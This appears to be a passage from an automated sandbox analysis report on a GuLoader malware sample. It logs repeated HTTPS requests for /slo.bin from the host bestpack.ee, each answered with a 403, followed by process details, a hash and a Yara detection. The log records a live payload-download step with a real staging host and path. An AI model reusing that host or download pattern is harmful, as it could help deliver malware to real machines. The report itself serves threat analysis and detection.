2024-09-27 17:01:16 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49789 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:01:27 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:01:28 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:01:28 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:01:28 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49791 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:01:39 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:01:39 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:01:39 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:01:39 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49793 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:01:50 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:01:51 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:01:50 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:01:51 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49795 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:01 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:02 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:02 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:02 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49797 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:13 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:13 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:13 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:13 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49799 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:24 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:25 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:24 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:25 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49801 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:35 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:36 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:36 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:36 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49803 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:47 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:47 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:47 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:47 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49805 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:02:58 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:02:59 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:02:58 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:02:59 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49807 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:03:10 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:03:10 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:03:10 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:03:10 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49809 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:03:21 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:03:21 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:03:21 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:03:21 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49811 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:03:32 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:03:33 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:03:33 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:03:33 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49813 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:03:44 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:03:44 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:03:44 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:03:44 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49815 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:03:55 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:03:56 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:03:55 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:03:56 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49817 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:04:06 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:04:07 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:04:07 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:04:07 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49819 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:04:18 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:04:18 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:04:18 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:04:18 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49821 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:04:29 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:04:30 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:04:30 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:04:30 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49823 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:04:41 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:04:41 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:04:41 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:04:41 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49825 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:04:52 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:04:52 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:04:52 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:04:52 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49827 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:05:03 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:05:04 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:05:04 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:05:04 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49829 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:05:15 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:05:15 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:05:15 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:05:15 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49831 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:05:26 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:05:26 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:05:26 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:05:26 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49833 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:05:37 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:05:38 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:05:38 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:05:38 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49835 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:05:49 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:05:49 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:05:49 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:05:49 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49837 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:06:00 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:06:00 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:06:00 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:06:00 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 49839 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:06:11 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:06:12 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:06:12 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:06:12 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49841 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:06:23 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:06:23 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:06:23 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:06:23 UTC | 83 | IN | Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49843 | 185.86.211.137 | 443 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 17:06:34 UTC | 187 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: bestpack.ee
Connection: Keep-Alive
2024-09-27 17:06:34 UTC | 163 | IN | HTTP/1.1 403 Forbidden
Date: Fri, 27 Sep 2024 17:06:34 GMT
Server: Apache
Content-Length: 83
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-09-27 17:06:34 UTC | 83 | IN | Data Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>



                                                                                                                      Target ID:0
                                                                                                                      Start time:12:58:09
                                                                                                                      Start date:27/09/2024
                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5 hash:09646B466D4203F0A605120C10248654
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.72566552229.0000000006D62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:12:58:37
                                                                                                                      Start date:27/09/2024
                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5 hash:09646B466D4203F0A605120C10248654
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.76719471404.0000000003592000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
